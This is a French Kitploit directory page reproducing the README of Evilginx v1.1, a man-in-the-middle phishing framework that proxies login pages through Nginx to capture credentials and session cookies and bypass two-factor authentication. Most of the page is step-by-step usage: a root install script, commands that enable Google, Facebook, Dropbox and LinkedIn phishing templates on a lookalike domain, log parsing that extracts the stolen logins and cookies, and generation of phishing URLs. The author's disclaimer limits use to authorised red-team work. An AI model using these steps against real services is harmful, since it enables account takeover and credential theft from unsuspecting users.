Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
evilginx — VEUILLEZ UTILISER LA NOUVELLE VERSION: https://github.com/kgretzky/evilginx2 | Kitploit
Outils/GitHubGitHub/kgretzky/evilginx
Outils de PhishingExploitation d'Applications WebHameçonnageTests d'IntrusionIngénierie SocialeAuthentificationRed Teaming
GitHubkgretzky/evilginx

evilginx

VEUILLEZ UTILISER LA NOUVELLE VERSION: https://github.com/kgretzky/evilginx2

Voir le dépôt
1.2k281il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Evilginx v.1.1.0

Evilginx

CETTE VERSION EST OBSOLÈTE. VEUILLEZ UTILISER LA DERNIÈRE VERSION !

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx est un framework d'attaque man-in-the-middle utilisé pour le phishing d'identifiants et de cookies de session de n'importe quel service web. Son cœur s'exécute sur le serveur HTTP Nginx, qui utilise proxy_pass et sub_filter pour proxyfier et modifier le contenu HTTP, tout en interceptant le trafic entre le client et le serveur.

Vous pouvez apprendre comment cela fonctionne et comment tout installer vous-même sur mon blog :

Premier article légèrement obsolète maintenant : Evilginx - Phishing avancé avec contournement de l'authentification à deux facteurs

Mise à jour Evilginx 1.0 : Mise à jour Evilginx 1.0 - Passez à la vitesse supérieure en matière de phishing 2FA

Mise à jour Evilginx 1.1 : Mise à jour Evilginx 1.1

Avertissement

Je suis conscient qu'Evilginx peut être utilisé à des fins très néfastes. Ce travail n'est qu'une démonstration de ce que des attaquants compétents peuvent faire. Il est de la responsabilité du défenseur de prendre en compte de telles attaques lors de la mise en place de défenses et de trouver des moyens de se protéger contre cette méthode de phishing. Evilginx ne doit être utilisé que dans le cadre de missions légitimes de tests de pénétration avec l'autorisation écrite des parties devant être phishées.

Temple de la renommée des contributeurs

@poweroftrue

Installation

Evilginx fournit un script d'installation install.sh qui se charge d'installer l'ensemble du package sur n'importe quelle machine Debian wheezy/jessie, de manière 'fire and forget'.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Utilisation

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configurer Evilginx.
    parse               Analyser les fichiers journaux.
    genurl              Générer une URL de phishing.

optional arguments:
  -h, --help            afficher ce message d'aide et quitter
Configuration

Activer ou désactiver les configurations de site pour une utilisation avec le serveur Nginx, en utilisant les modèles Evilginx fournis depuis le répertoire sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            afficher ce message d'aide et quitter
  -d DOMAIN, --domain DOMAIN
                        Votre domaine de phishing.
  -y                    Répondre 'Oui' à toutes les questions.
  -l, --list            Lister les applications supportées disponibles.
  --enable ENABLE       Activer le site suivant par nom.
  --disable DISABLE     Désactiver le site suivant par nom.

Lister les modèles de configuration de site disponibles :

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Activer le site de phishing Google avec le domaine de phishing préenregistré not-really-google.com :

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

Désactiver le site de phishing Facebook :

root@kitploit:~
python evilginx.py setup --disable facebook
Analyse

Analyser les journaux Nginx pour extraire les identifiants de connexion et les cookies de session interceptés. Les journaux, par défaut, sont enregistrés dans le répertoire logs, où réside le script evilginx.py. Cela peut être fait automatiquement après avoir activé l'analyse automatique dans la phase Configuration.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            afficher ce message d'aide et quitter
  -s SITE, --site SITE  Nom du site pour lequel analyser les journaux ('all' pour analyser les journaux de tous les sites).
  --debug               Ne pas tronquer le fichier journal après l'analyse.

Analyser les journaux uniquement pour le site Google :

root@kitploit:~
python evilginx.py parse -s google

Analyser les journaux pour tous les sites disponibles :

root@kitploit:~
python evilginx.py parse -s all
Générer l'URL

Générer des URL de phishing que vous pouvez utiliser dans vos évaluations Red Team.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            afficher ce message d'aide et quitter
  -s SITE, --site SITE  Nom du site pour lequel générer le lien.
  -r REDIRECT, --redirect REDIRECT
                        Rediriger l'utilisateur vers cette URL après une connexion réussie.

Générer une URL de phishing Google qui redirigera la victime vers la vidéo rick roll après une connexion réussie :

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
Télécharger l’outil